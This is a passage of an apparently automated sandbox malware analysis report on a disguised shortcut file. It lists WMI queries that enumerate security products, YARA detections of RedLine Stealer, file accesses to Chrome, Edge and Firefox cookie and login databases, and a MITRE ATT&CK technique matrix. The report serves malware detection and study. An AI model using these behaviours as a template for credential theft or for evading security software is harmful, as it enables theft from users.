Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 14.2.AutoIt3.exe.442c974.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.updater.exe.417c974.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.updater.exe.417c974.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.AutoIt3.exe.3d1c974.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.AutoIt3.exe.3d1c974.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.AutoIt3.exe.442c974.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.2428270359.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2357090356.0000000004410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2354019803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2230558308.0000000004940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2351472227.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2233978914.0000000004160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2432130192.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2351600972.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2230437653.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2428369373.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 3780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 1684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 3580, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Source: AutoIt3.exe	Binary or memory string: WIN_81
Source: AutoIt3.exe	Binary or memory string: WIN_XP
Source: AutoIt3.exe	Binary or memory string: WIN_XPe
Source: AutoIt3.exe	Binary or memory string: WIN_VISTA
Source: AutoIt3.exe	Binary or memory string: WIN_7
Source: AutoIt3.exe	Binary or memory string: WIN_8
Source: AutoIt3.exe, 00000010.00000000.2422373901.0000000000A36000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 14.2.AutoIt3.exe.442c974.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.updater.exe.417c974.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.updater.exe.417c974.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.AutoIt3.exe.3d1c974.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.AutoIt3.exe.3d1c974.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.AutoIt3.exe.442c974.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.2428270359.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2357090356.0000000004410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2354019803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2230558308.0000000004940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2351472227.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2233978914.0000000004160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2432130192.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2351600972.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2230437653.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2428369373.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 3780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 1684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 3580, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 14.2.AutoIt3.exe.442c974.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.updater.exe.417c974.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.updater.exe.417c974.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.AutoIt3.exe.3d1c974.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.AutoIt3.exe.3d1c974.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.AutoIt3.exe.442c974.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.2428270359.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2357090356.0000000004410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2354019803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2230558308.0000000004940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2351472227.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2233978914.0000000004160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2432130192.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2351600972.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2230437653.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2428369373.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 3780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 1684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AutoIt3.exe PID: 3580, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004D696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	11_2_004D696E
Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exe	Code function: 11_2_004D6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	11_2_004D6E32
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009F696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	14_2_009F696E
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009F6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	14_2_009F6E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 Create Account	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	13 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	1 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	169 System Information Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	111 Masquerading	LSA Secrets	261 Security Software Discovery	SSH	3 Clipboard Data	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	251 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Agreement for Cooperation.PDF.lnk.download.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Agreement for Cooperation.PDF.lnk.download.lnk